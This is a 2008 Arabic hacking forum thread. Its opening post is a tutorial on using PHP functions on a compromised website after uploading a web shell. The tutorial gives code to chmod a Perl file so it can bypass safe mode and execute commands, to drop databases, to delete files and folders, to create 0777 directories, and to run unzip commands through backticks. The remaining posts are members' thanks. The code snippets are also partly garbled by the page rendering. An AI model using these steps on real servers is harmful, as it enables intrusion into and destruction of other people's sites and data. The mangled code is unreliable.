التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 10-25-2008, 02:24 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية Crazy Dz
 

 

 
إحصائية العضو







Crazy Dz غير متواجد حالياً

إرسال رسالة عبر MSN إلى Crazy Dz

 

 

إحصائية الترشيح

عدد النقاط : 10
Crazy Dz is on a distinguished road

افتراضي استغلال الدوال بطريقة احترافية



السلام عليكم ورحمة الله
الدرس كنت نزلتة من فترة كان المنتدى مقفول حبيت اضعة بالمنتدى
التحكم فى الملفات واعطاء تصاريح فى وضع السيف موود اون
الكثير منا عندما يستغل اى ثغرة تمكنة من رفع شيل يواجة السيف مود
الحاجز بينة وبين سطر الاوامر ويتطرق لتخطى السيف موود بعدة طريق
واساليب منها السى جى اى وشيل الــ r57 بلغة البيرل ولاكن تواجهنا مشكلة أعطاء تصريح 755 للملف وهنا السؤال ازاى ادى تصريح وانا مش قادر انفذ اوامر
الطريقة الاعتيادية لأعطاء تصريح لملف بيرل عن طريق سطر الاوامر
بالامر التالى chmod file.pl 755
طيب احنا ديماّ بنشوف الدوال الممنوعة ونسمع ان فى دوال خطر انها تفضل شغال ولابد ايقافها لكن مش كلنا نعرف استغلال الدوال دى فى الاختراق
اول حاجة جزء كبير منا بينفذ الاوامر وهوة فاهم فيدتها اية لكن
معندوش دراية خطوات تنفيذ الامر اية يعنى مثلاّ
الامر chmod file.pl 755
chmod هى دالة فى البى اتش بى
عن طرقها بندى تصريح لملف او فولدر وبنستغلها عن طريق سطر الاوامر فى حالة السيف موود اوف لكن فى حالة ان السيف موود اون
البعض منا يعتقد ان بذالك لا يمكن اعطاء اوامر او صلاحيات الخ..
الدرس اليوم استغلال الدوال بطريقة احترافية اتكلمت كتير تعالو نتطرق للمهم فى الدرس
=============
رفعنا شيل على اى موقع والسيف مود كان اون ومش قدرين ندى تصريح لملف البيرل علشان نتخطي ونفذ اوامر برحتنا
طيب ارفع ملف البيرل بتاعك فى اى فولدر فية تصريح او بنفس الطريقة اللى رفعت الشيل منها للموقع
تانى حاجة اعمل ملف تكست جديد وحط فية الكود دة

كود PHP:
<?  
chmod
("file.pl" 0755);  
?>
= اسم ملف التخطى بلغة البيرل الذى يحتاج لتصريح 755 لتخطي السيف مود
سيف الملف بأى اسم دوت php بعد كدة ارفعة للموقع بنفس طريقة رفع الشيل وافتحة من المتصفح واتوجة للشيل مرة اخرى ستجد ان الملف
اخد تصريح 755 ويمكنك استخدام ملف البيرل لتحقيق هدفك من الاختراق بعد اعطاء التصريح .
نكمل الدرس مع بعض الدوال
mysql_drop_db
وظيفة الدالة مسح قاعدة بيانات ودة مثال بسيط على الاستغلال
كود PHP:
?  
// الاتصال  
$connect mysql_connect("localhost""user""password");  
// التحقق من الاتصال   
if (!$connect) {  
echo 
"لم يتم الاتصال";  
exit;  
}  
// الداله التي قمنا بشرحها  
$drop mysql_drop_db("DBname");  
//التحقق من الحذف  
if ($drop) {  
echo 
"تم حذف قاعدة البيانات بنجاح";  
}  
else {  
echo 
"لم يتم حذف القاعدة";  
}  
?> 
ودى بعض الاستغلالات لبعض الدوال
كود PHP:
<?  
$filename 
"file.php"
$del unlink($filename);   
if (
$del) {  
echo 
"تم الحذف";  
}  
if (!
$del) {  
echo 
"لم يتم الحذف";  
}  
?>
كود PHP:
<?  
$foldername 
"antisec";  
$remove rmdir($foldername);  
if (
$remove) {  
echo 
"تم الحذف بنجاح !!";  
}  
if (!
$remove) {  
echo 
"لم يتم الحذف";  
}  
?>
كود PHP:
<?  
mkdir
("DirName" 0777);  
?>
يوجد دوال لفك الظغط

ودة كود لفك الظغط
كود PHP:
 <?php 
$zip 
zip_open("0.zip"); 
if (
$zip) { 
  while (
$zip_entry zip_read($zip)) { 
    
$fp fopen("zip/".zip_entry_name($zip_entry), "w"); 
    if (
zip_entry_open($zip$zip_entry"r")) { 
      
$buf zip_entry_read($zip_entryzip_entry_filesize 

($zip_entry)); 
      
fwrite($fp,"$buf"); 
      
zip_entry_close($zip_entry); 
      
fclose($fp); 
    } 
  } 
  
zip_close($zip); 

?>
كود PHP:
  <? 
$path 
'/home/user/public_html/'
$file '0.zip'

$path_parts pathinfo($file); 
$ext $path_parts[extension]; 

if(
$ext == 'gz'

    
$execute "gunzip -".$path.$file"
    `
$execute`; 

if(
$ext == 'zip'

    
$execute "unzip -u $file -d $path"
    `
$execute`; 

?>
zip.0

اسم الملف اللى عايز تفك ظغطة


ملف في المرفقات
موضوع منقول للأهمية





hsjyghg hg],hg f'vdrm hpjvhtdm

الملفات المرفقة
نوع الملف: txt 1.txt‏ (161 بايت, المشاهدات 9)
:: نصائح مهمه :: - أفحص الملف المرفق بأي برنامج مضاد للفيروسات
2- قم بمراسلة المراقب عن أي مرفق يوجد به فيروس
3- المنتدى غير مسوؤل عن مايحتويه المرفق من بيانات
التوقيع

http://im9.gulfup.com/2011-09-14/1316009561971.jpg

 

   

رد مع اقتباس
قديم 10-25-2008, 03:44 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
The Final Doom
:: vBspiders Founder ::
 
الصورة الرمزية The Final Doom
 

 

 
إحصائية العضو









The Final Doom غير متواجد حالياً

إرسال رسالة عبر ICQ إلى The Final Doom إرسال رسالة عبر AIM إلى The Final Doom إرسال رسالة عبر MSN إلى The Final Doom إرسال رسالة عبر Yahoo إلى The Final Doom إرسال رسالة عبر Skype إلى The Final Doom

 

 

إحصائية الترشيح

عدد النقاط : 12
The Final Doom is on a distinguished road

افتراضي


بارك الله فيك حبيبي هـيوسكـآ :d

التوقيع




In God, You have to trust

$Contact
Skype:imadgb20
//
\\




 

   

رد مع اقتباس
قديم 10-25-2008, 05:49 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
إحصائية العضو






●๋•ஜ ⋋MATRX H@!L⋌ ஜ●๋• غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
●๋•ஜ ⋋MATRX H@!L⋌ ஜ●๋• is on a distinguished road

افتراضي


الف شكـر على الشرح المتعووب عليه

التوقيع


أهلا وسهلا بكم في
VBSPideR
-

Xxدعنـي آرقص رقصة الموٍت بين يديكـxX

 

   

رد مع اقتباس
قديم 10-26-2008, 10:54 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
MrXRoMaNcE1
VBSPIDERS TEAM
 
الصورة الرمزية MrXRoMaNcE1
 

 

 
إحصائية العضو






MrXRoMaNcE1 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
MrXRoMaNcE1 is on a distinguished road

افتراضي


مشكككور هيسوكا ابداع كالعادة :d

التوقيع

 

   

رد مع اقتباس
قديم 10-27-2008, 08:47 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية Sniper_Mo
 

 

 
إحصائية العضو







Sniper_Mo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Sniper_Mo is on a distinguished road

افتراضي


الف شكر اخي هيسوكا
على المعلومات القيمة

التوقيع

سيستمر غيابي عن الشبكة والانترنت لعدة اسابيع اخرى. ارجو ان تدعولي لانني امر بازمات :088: عدة. وشكرا لكم

 

   

رد مع اقتباس
قديم 11-08-2008, 04:36 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية كنكشن
 

 

 
إحصائية العضو





كنكشن غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
كنكشن is on a distinguished road

افتراضي


بارك الله فيك اخوي درس ممتاز ومميز

   

رد مع اقتباس
قديم 11-08-2008, 05:42 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
EXE
.::TuNiSiAn EviLs::.
 
الصورة الرمزية EXE
 

 

 
إحصائية العضو





EXE غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
EXE is on a distinguished road

افتراضي


شكرا

التوقيع


HTTP@Hacker.ExE
تعشق الموت لكي لا تعشقنا الحياة
فدخلت مدارس الهاكر لتعاقب الحقراء
فتعملت فنون الهاكر بكل أنواع الجنون
تعلمت حين تقول نعم ... فقط من أجل العيون
الهاكر حرب ... وكل من قادها يا عمرى مجنون
لا تسأل من تكون ؟
انت من كتب دستور الهاكر ... وأنت من وضع له قانون

http://img268.imageshack.us/img268/8493/ellaho.jpg

 

   

رد مع اقتباس
قديم 11-13-2008, 04:31 AM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية PiNki
 

 

 
إحصائية العضو





PiNki غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
PiNki is on a distinguished road

افتراضي


شكرا أخي
وصل إبداعك

   

رد مع اقتباس
قديم 11-21-2008, 09:49 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
Sho0Ter
:: MaNaGeMeNT ::
 
الصورة الرمزية Sho0Ter
 

 

 
إحصائية العضو








Sho0Ter غير متواجد حالياً

إرسال رسالة عبر ICQ إلى Sho0Ter إرسال رسالة عبر AIM إلى Sho0Ter إرسال رسالة عبر Yahoo إلى Sho0Ter

 

 

إحصائية الترشيح

عدد النقاط : 10
Sho0Ter is on a distinguished road

افتراضي


ديما مبدع اخى هيسوكا

التوقيع

A.K.A >>MANAGEMENT

:a28: :a28:
:41:V@Mp!rES KiNg:41:


COME BACK :d TO LOVELY SITE


GANGS WAR OF HACKIN 4 LIFE

CΘИECƬ: ASK ME

WaИTED

 

   

رد مع اقتباس
قديم 11-21-2008, 09:56 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
AbO-Ra3d
root@localhost
 
الصورة الرمزية AbO-Ra3d
 

 

 
إحصائية العضو






AbO-Ra3d غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
AbO-Ra3d is on a distinguished road

افتراضي


مشكور هيسوكا تسلم

   

رد مع اقتباس
قديم 11-21-2008, 09:58 PM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
الصورة الرمزية PROF
 

 

 
إحصائية العضو







PROF غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى PROF

 

 

إحصائية الترشيح

عدد النقاط : 10
PROF is on a distinguished road

افتراضي


مشكور اخي هيسوكا

التوقيع

EgYpT@ My BlOoD


 

   

رد مع اقتباس
قديم 11-21-2008, 10:00 PM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
الصورة الرمزية PROF
 

 

 
إحصائية العضو







PROF غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى PROF

 

 

إحصائية الترشيح

عدد النقاط : 10
PROF is on a distinguished road

افتراضي


مشكور اخي علي الموضوع
والله مقصرت
التوقيع

EgYpT@ My BlOoD


 

   

رد مع اقتباس
قديم 11-23-2008, 03:03 AM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
الصورة الرمزية كارلوس
 

 

 
إحصائية العضو





كارلوس غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
كارلوس is on a distinguished road

افتراضي


شكرا

   

رد مع اقتباس
قديم 11-24-2008, 01:59 AM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
إحصائية العضو







العربي الصغير غير متواجد حالياً

إرسال رسالة عبر MSN إلى العربي الصغير

 

 

إحصائية الترشيح

عدد النقاط : 10
العربي الصغير is on a distinguished road

افتراضي


تسلم يدك اخي شكراً جزيلاً لك

التوقيع

http://img295.imageshack.us/img295/8...e819673un5.gif

 

   

رد مع اقتباس
قديم 11-28-2008, 01:23 PM   رقم المشاركة : 15 (permalink)
معلومات العضو
 
الصورة الرمزية ThE g0bL!N
 

 

 
إحصائية العضو






ThE g0bL!N غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ThE g0bL!N is on a distinguished road

افتراضي


مشكووور هيسوكا

بطل

التوقيع

http://www.wieistmeineip.de/ip-address/

http://150.jeeran.com/علم%20الجزائر.gif

x0q@hotmail.fr

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
تخطى حماية مراكز التحميل العربية ( استغلال الدوال ) Dr.Alaa قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 45 10-26-2011 03:07 PM
تشفير سيرفر البيفروست بطريقة احترافية kemo.devil قـسـم الـبـريد الإلـكتروني والحسابات العامة 1 12-10-2010 11:35 PM
...::شرح الدمج بطريقة احترافية::... Garwasha قســم إختــراق الأجهــزة 638 11-13-2010 02:47 PM
تعال تعلم الدمج بطريقة احترافية و بدون برامج kamaz قســم إختــراق الأجهــزة 10 07-19-2008 06:02 PM


الساعة الآن 10:03 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0